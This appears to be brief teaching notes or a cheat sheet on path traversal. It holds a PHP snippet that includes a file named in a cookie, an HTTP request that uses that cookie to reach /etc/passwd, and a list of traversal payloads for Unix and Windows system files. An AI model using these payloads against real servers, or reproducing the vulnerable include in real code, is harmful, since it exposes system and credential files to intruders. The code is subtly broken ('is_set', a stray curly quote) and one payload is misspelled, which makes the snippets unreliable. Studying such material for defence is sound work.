Good URL in browser location

https://www.vulnerable-site.com/images?filename=cat.png

Bad URL in browser location

https://www.vulnerable-site.com/images?filename=/etc/passwd

Vulnerable code example

<?php
  $template = 'blue.php';
  if ( is_set( $_COOKIE['TEMPLATE'] ) )
     $template = $_COOKIE['TEMPLATE’]; 
  include ( "/home/users/phpguru/templates/" . $template );
?>

Vulnerable request

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
...

Payloads

Regular cases

../../../../../../etc/passwd

.\\..\\..\\..\\..\\..\\windows\\win.ini

Absolute paths

/etc/passwwd

C:\\Windows\\System32\\XYZ.txt

Defence ‘sequence stripped non-recursively’ defeated